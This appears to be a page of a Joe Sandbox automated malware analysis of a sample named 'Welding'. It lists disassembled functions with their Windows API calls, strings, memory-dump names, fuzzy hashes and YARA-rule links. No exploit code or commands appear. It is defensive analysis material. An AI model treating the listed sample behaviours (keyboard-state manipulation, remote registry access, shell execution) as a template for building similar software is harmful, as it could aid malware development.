Instruction ID: 90cae44403f3af907fbc653a2fdc27d9f37505b8c0e808d55a7dc5114458dc98
Opcode Fuzzy Hash: 65b025212073cf8be1707e29ae6b6539c018a30854b5f8e2034680d1705f0f40
Instruction Fuzzy Hash: AE112B7960D307BEE7495A14EC82CEA779DDF06B60B10003AFA2096282E7746FC045B5

Function 001147E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00114802
LoadStringW.USER32(00000000), ref: 00114809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0011481F
LoadStringW.USER32(00000000), ref: 00114826
_wprintf.LIBCMT ref: 0011484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00114847

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: d106c08c754a5070fc5ae30e425fb7b0f9a53af7534f4557ad69378e4d00d574
Instruction ID: dbd1b2e1ec89ad7b5f9b629a4d734a1d806d0d6dbe5a0759fa3baae2268beff9
Opcode Fuzzy Hash: d106c08c754a5070fc5ae30e425fb7b0f9a53af7534f4557ad69378e4d00d574
Instruction Fuzzy Hash: 6E018FF68002087FE712D7A19D89EF6737CEB08300F4001A5BB0AE2051EB309EC44B71

Function 0013DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

GetSystemMetrics.USER32(0000000F), ref: 0013DB42
GetSystemMetrics.USER32(0000000F), ref: 0013DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0013DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0013DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0013DDDC
ShowWindow.USER32(00000003,00000000), ref: 0013DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 0013DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 0013DE43

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 96a748780ebb4a5f4294dc5d169c5de75d0d414b7a691b135d93f674ed78f435
Instruction ID: 1ee010bea24874fc33b6fb456fd806918660d892d5bf89144add9cd561ad0d48
Opcode Fuzzy Hash: 96a748780ebb4a5f4294dc5d169c5de75d0d414b7a691b135d93f674ed78f435
Instruction Fuzzy Hash: F5B1AA75600215EFDF18CF69E9857AD7BB1FF08701F098069ED48AF299D730A990CBA0

Function 00130371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013044E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 30951c6737896f5b1e3683dc2cbc03606351044a8b137d62a6c97e3697f65b88
Instruction ID: 38d92b193701292d275814aeb2aa77a45b7443a26f9434da7801f6a35b1cda9a
Opcode Fuzzy Hash: 30951c6737896f5b1e3683dc2cbc03606351044a8b137d62a6c97e3697f65b88
Instruction Fuzzy Hash: 68A17B702042019FCB16EF24C891FAEBBE5EF89314F14891DF5969B2A2DB31E955CF42

Function 000B2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000B2E9F
ShowWindow.USER32(?,00000000,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000,000000FF), ref: 000B2EE7
ShowWindow.USER32(?,00000006,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000EC55B
ShowWindow.USER32(?,?,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000EC5C7

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6076438b49f552dad720fd5ddb8da31e1aa009937f5a0c5416ed1df6d55332c4
Instruction ID: 9c41a92b284164f01c2ecf516fdedac09d52cabea8d51a0c479d4a3f625dccb4
Opcode Fuzzy Hash: 6076438b49f552dad720fd5ddb8da31e1aa009937f5a0c5416ed1df6d55332c4
Instruction Fuzzy Hash: 4041F831604AC09ED7BA872B8DCCBEE7BE2AB96300F24440DE56756AA1C771F8C1D711

Function 00117681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00117698

Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001176CF
EnterCriticalSection.KERNEL32(?), ref: 001176EB
_memmove.LIBCMT ref: 00117739
_memmove.LIBCMT ref: 00117756
LeaveCriticalSection.KERNEL32(?), ref: 00117765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0011777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00117799

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 8d089bdea3b5c6f8a1c6714bf68ee517e9c81095f5b222813b2af04f792d7e2e
Instruction ID: c01ad9715a3390bbe8187181b79a34d1b575266ec33798e9e08c7a3f5b44754f
Opcode Fuzzy Hash: 8d089bdea3b5c6f8a1c6714bf68ee517e9c81095f5b222813b2af04f792d7e2e
Instruction Fuzzy Hash: BB318335904205EBDB10EF95DC85EAEBB78EF45700F2440B6F904AB296DB70DE94CBA0

Function 001367F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00136810
GetDC.USER32(00000000), ref: 00136818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00136823
ReleaseDC.USER32(00000000,00000000), ref: 0013682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0013686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0013687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0013964F,?,?,000000FF,00000000,?,000000FF,?), ref: 001368B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001368D6

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 1591ff01c461d3ef8c36b74dc42cc95c169c42fca3b0f001537d56f55df113dc
Instruction ID: 5f1024d5a40f8b26a366238aa85ec2bb0a33e4106e5f71c9f5712b45e8c282d2
Opcode Fuzzy Hash: 1591ff01c461d3ef8c36b74dc42cc95c169c42fca3b0f001537d56f55df113dc
Instruction Fuzzy Hash: BB316B76101214BFEB118F51CC8AFAA3BA9EF4E765F044065FF089A2A1D7759891CBB0

Function 0010C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0010C75D
_memcmp.LIBCMT ref: 0010C77F
_memcmp.LIBCMT ref: 0010C797
_memcmp.LIBCMT ref: 0010C7AA
_memcmp.LIBCMT ref: 0010C7C4
_memcmp.LIBCMT ref: 0010C7D7
_memcmp.LIBCMT ref: 0010C7EF
_memcmp.LIBCMT ref: 0010C80A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 19d85950250ad0bb3d6f6fc7141e744d200d1db42bd10c9b4056fe99cba74f20
Instruction ID: 95998ac9603c4d5a8d3bd2cdc8ae5a40122c5bd13c44cca6d25b264534106c9b
Opcode Fuzzy Hash: 19d85950250ad0bb3d6f6fc7141e744d200d1db42bd10c9b4056fe99cba74f20
Instruction Fuzzy Hash: A721D4726052057BD20877208E82FEB376CDF25794B048222FD46A63D3EB90DE118EF5

Function 0011F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D

_wcstok.LIBCMT ref: 0011F2D7
_wcscpy.LIBCMT ref: 0011F366
_memset.LIBCMT ref: 0011F399

Strings

X, xrefs: 0011F3D6

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 7670cf1922e3264048bf159b2f9289ea126c3bb96c7349f9a0a70a0ab38832f0
Instruction ID: ee88b981c045aef990b786532327939c94547c73a8d74759521a5d2e0ba77c91
Opcode Fuzzy Hash: 7670cf1922e3264048bf159b2f9289ea126c3bb96c7349f9a0a70a0ab38832f0
Instruction Fuzzy Hash: 74C16C715083419FC718EF64C895ADEB7E5BF89350F00492DF899972A3DB30E946CB92

Function 000B1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 913bd731271dff28e3e3f8c17b041f95e1a4270a8bbc7a60a6bb894befd32fcc
Instruction ID: a91b7ec4cae45d14d2ef26747dff829d98e0f609f76fcbc4ede41ebbbba5cf25
Opcode Fuzzy Hash: 913bd731271dff28e3e3f8c17b041f95e1a4270a8bbc7a60a6bb894befd32fcc
Instruction Fuzzy Hash: 1E716D74900109EFCB15CF59CC98AEEBBB9FF8A314F648159F915AB251CB309A51CBA0

Function 00127261 Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 806424c4ee2cd558641a8469d9480e5c9db074d1e8692b27873865cffdf90581
Instruction ID: e04457ebac3ab775b7b2cedb638460f1acd95419d651dd7068353d446ce15303
Opcode Fuzzy Hash: 806424c4ee2cd558641a8469d9480e5c9db074d1e8692b27873865cffdf90581
Instruction Fuzzy Hash: 31618D71508250ABC314EB24DC96FAFB7A8EF94710F10491DF956972E3DB709E41CB92

Function 0013B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0013BA5D
IsWindowEnabled.USER32(?), ref: 0013BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0013BB4D
SendMessageW.USER32(?,000000B0,?,?), ref: 0013BB84
IsDlgButtonChecked.USER32(?,?), ref: 0013BBC1
GetWindowLongW.USER32(?,000000EC), ref: 0013BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0013BBFB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: a85e91679d719458dd0faef4ec83f68fe61678c5fde0f4434c3d40366c467c7f
Instruction ID: 24cad3ac3b2f08eacf08a2021662b7055b52796e60954b85c19094dd9dab4e6c
Opcode Fuzzy Hash: a85e91679d719458dd0faef4ec83f68fe61678c5fde0f4434c3d40366c467c7f
Instruction Fuzzy Hash: 5671C234609604EFDB259F54C8D4FBAB7B5EF4A300F144059EB4A972A5EB31AD90CB60

Function 0012FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0012FB31
_memset.LIBCMT ref: 0012FBFA
ShellExecuteExW.SHELL32(?), ref: 0012FC3F

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D

GetProcessId.KERNEL32(00000000), ref: 0012FCB6
CloseHandle.KERNEL32(00000000), ref: 0012FCE5

Strings

@, xrefs: 0012FC0E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: add9a10bf9d5afe00f55ea2b50c34cbd73ad9bc300035c95da33a9e2d31831b8
Instruction ID: 2d30b9d500a1afb09125cb95e4a60c793e2f3f64bb518c32143c2e09a097b0e0
Opcode Fuzzy Hash: add9a10bf9d5afe00f55ea2b50c34cbd73ad9bc300035c95da33a9e2d31831b8
Instruction Fuzzy Hash: 2B61BF75A006299FCB14EF54D4909EDBBF5FF48310F14846DE846AB352CB30AE52CB90

Function 0011174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0011178B
GetKeyboardState.USER32(?), ref: 001117A0
SetKeyboardState.USER32(?), ref: 00111801
PostMessageW.USER32(?,00000101,00000010,?), ref: 0011182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 0011184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00111894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 001118B7

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: be9a47122856b6d568803d45c074d7706a72afec1120bf0812412f2faea7ea64
Instruction ID: eec1267e7e381d1919ff628caf52d3e7e9a67e775cf5021265c3966e51c708aa
Opcode Fuzzy Hash: be9a47122856b6d568803d45c074d7706a72afec1120bf0812412f2faea7ea64
Instruction Fuzzy Hash: B551D5A0A187D53DFB3A8234CC55BFAFEE95B06304F0885A9E2D5468D2D398ECD4D750

Function 00111565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 001115A4
GetKeyboardState.USER32(?), ref: 001115B9
SetKeyboardState.USER32(?), ref: 0011161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00111646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00111663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001116A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001116C8

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: dd9cb519c7b7be274d27f969abda78a525b14e476e6a655bce528159ec87c804
Instruction ID: 5e8db00edaaeb6013713161511ffc9d7f8b101aeab3da67edc01c7555e940723
Opcode Fuzzy Hash: dd9cb519c7b7be274d27f969abda78a525b14e476e6a655bce528159ec87c804
Instruction Fuzzy Hash: 845106A09087D53DFB3A83248C01BFAFEA95F06300F0C44A9E2D5469C2D7D5ACC4E761

Function 00115BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00115BC5
_wcsncpy.LIBCMT ref: 00115BFA
_wcsncpy.LIBCMT ref: 00115C2C
_wcsncpy.LIBCMT ref: 00115C5F
_wcsncpy.LIBCMT ref: 00115CA1
_wcsncpy.LIBCMT ref: 00115CDB
_wcsncpy.LIBCMT ref: 00115D0A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: b5a2f89175cc8ebcbd52db5238f795d8e9e3e6c99f69bb3d13ffad7701d0ae52
Instruction ID: 5720f8bea791901cda3a9c24e2c1794cb86937a0f18fc18babb0ec2cbbb11316
Opcode Fuzzy Hash: b5a2f89175cc8ebcbd52db5238f795d8e9e3e6c99f69bb3d13ffad7701d0ae52
Instruction Fuzzy Hash: 5D4170A5C10618B6CB51EBF488469DFB3BD9F04320F504866E509E3222E734A655C3FA

Function 00113B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00113B8A,?), ref: 00114BE0

Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00113B8A,?), ref: 00114BF9

lstrcmpiW.KERNEL32(?,?), ref: 00113BAA
_wcscmp.LIBCMT ref: 00113BC6
MoveFileW.KERNEL32(?,?), ref: 00113BDE
_wcscat.LIBCMT ref: 00113C26
SHFileOperationW.SHELL32(?), ref: 00113C92

Strings

\*.*, xrefs: 00113C20

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
